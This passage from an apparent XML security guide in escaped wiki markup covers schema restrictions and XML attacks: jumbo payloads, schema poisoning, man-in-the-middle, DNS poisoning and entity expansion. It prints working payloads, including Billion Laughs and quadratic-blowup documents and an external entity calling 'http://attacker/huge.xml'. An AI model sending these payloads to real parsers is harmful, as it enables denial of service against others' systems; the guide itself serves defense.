      &amp;lt;xs:length value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add pattern restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific pattern:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:pattern value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for an SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components, introduced in XML Schema 1.1, constrain the existence and values of related elements and attributes in XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed.&lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an assertion disallowing the number zero:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:assertion test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
Not defining a maximum number of occurrences leaves the application to cope with whatever happens when it receives an extreme number of items to process. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could have a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could have a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;unbounded&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict maximum numbers of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an unbounded value.&lt;br /&gt;
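&lt;br /&gt;
As a sketch of the bounded alternative, the &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; element could carry an explicit upper limit. The value 100 is an arbitrary assumption; a suitable limit depends on what the application can process safely:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;!-- assumed limit of 100 buy elements per operation, for illustration only --&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;100&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
With this limit in place, a document containing more than 100 &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements would be rejected during validation instead of being handed to the application.&lt;br /&gt;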
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* '''Depth attack''': using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* '''Width attack''': using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER LARGENAME1=&amp;quot;LARGEVALUE&amp;quot; LARGENAME2=&amp;quot; LARGEVALUE&amp;quot; LARGENAME3=&amp;quot; LARGEVALUE&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE includeme [&lt;br /&gt;
  &amp;lt;!ENTITY file SYSTEM &amp;quot;http://attacker/huge.xml&amp;quot; &amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;file;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, and to be used safely it must include a way to check the integrity of the embedded schema.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML document or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
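&lt;br /&gt;
A permission audit for local schema files can be sketched in Python. This is a minimal illustration rather than part of the original guidance: the helper name &amp;lt;tt&amp;gt;is_world_writable&amp;lt;/tt&amp;gt; is hypothetical, and it only inspects the POSIX write flag for other users, ignoring ACLs and group membership:&lt;br /&gt;

```python
import os
import stat


def is_world_writable(path):
    """Return True when users outside the owner and group may write to path."""
    mode = os.stat(path).st_mode
    # stat.filemode() renders the mode as text such as '-rw-rw-rw-';
    # position 8 holds the write flag for "other" users.
    return stat.filemode(mode)[8] == "w"
```

A deployment check could call the helper on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; and refuse to process documents while it returns &amp;lt;tt&amp;gt;True&amp;lt;/tt&amp;gt;.&lt;br /&gt;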
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When XML documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text, so an attacker able to intercept the connection could read and modify the schema before it reaches the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
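&lt;br /&gt;
As a first line of defense, an application can refuse schema locations that are not fetched over an encrypted transport. The following Python sketch assumes a hypothetical helper named &amp;lt;tt&amp;gt;uses_encrypted_transport&amp;lt;/tt&amp;gt;; it only inspects the URL scheme and does not verify the content that is eventually retrieved:&lt;br /&gt;

```python
from urllib.parse import urlsplit


def uses_encrypted_transport(system_identifier):
    """Return True only when the schema location is fetched over HTTPS."""
    return urlsplit(system_identifier).scheme.lower() == "https"
```

With this check, the location &amp;lt;tt&amp;gt;http://example.com/note.dtd&amp;lt;/tt&amp;gt; used in the example would be rejected.&lt;br /&gt;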
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an Internet Protocol (IP) address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own IP addresses.&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, example.com resolves to the IP address 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; refers to another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined in terms of entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, the schema describes a circular reference between entities:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n^2)). The result of the following attack will be 100,000 * 100,000 (10^10) characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
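&lt;br /&gt;
The arithmetic behind the quadratic blowup can be checked with a short Python sketch. The function name &amp;lt;tt&amp;gt;quadratic_blowup&amp;lt;/tt&amp;gt; is hypothetical, and the size of the submitted document is approximated by ignoring the DOCTYPE and element markup:&lt;br /&gt;

```python
def quadratic_blowup(entity_length, reference_count):
    """Return (approximate characters sent, characters after expansion)."""
    # Each reference is an ampersand, the one-letter name A and a semicolon.
    reference_length = 3
    sent = entity_length + reference_count * reference_length
    expanded = entity_length * reference_count
    return sent, expanded


sent, expanded = quadratic_blowup(100_000, 100_000)
```

Under these assumptions, roughly 400,000 characters of input expand to 10,000,000,000 characters in memory.&lt;br /&gt;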
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the nested entities defined in the following code, the application will consume the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt; entities it references; each of these will in turn be resolved as 10 &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; entities, and so on. Finally, the CPU and/or memory will be affected by expanding the 10^9 (1,000,000,000) copies of the entity &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt;, or 3*10^9 (3,000,000,000) characters, defined in this schema, which could make the parser crash.&lt;br /&gt;
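&lt;br /&gt;
The growth of the nested entities can be worked out with a few lines of Python. This is only an illustrative calculation; the function name &amp;lt;tt&amp;gt;nested_expansion&amp;lt;/tt&amp;gt; and its parameters are hypothetical:&lt;br /&gt;

```python
def nested_expansion(levels, fanout, base_text):
    """Return (copies of the base entity, total characters) after expansion."""
    copies = fanout ** levels
    return copies, copies * len(base_text)


# Nine levels (LOL1 to LOL9), ten references per level, base text "LOL".
copies, characters = nested_expansion(levels=9, fanout=10, base_text="LOL")
```

Each additional level multiplies the result by ten, which is why a document of under one kilobyte is enough for the attack.&lt;br /&gt;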
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:Envelope [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:Envelope ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:Envelope entityReference CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
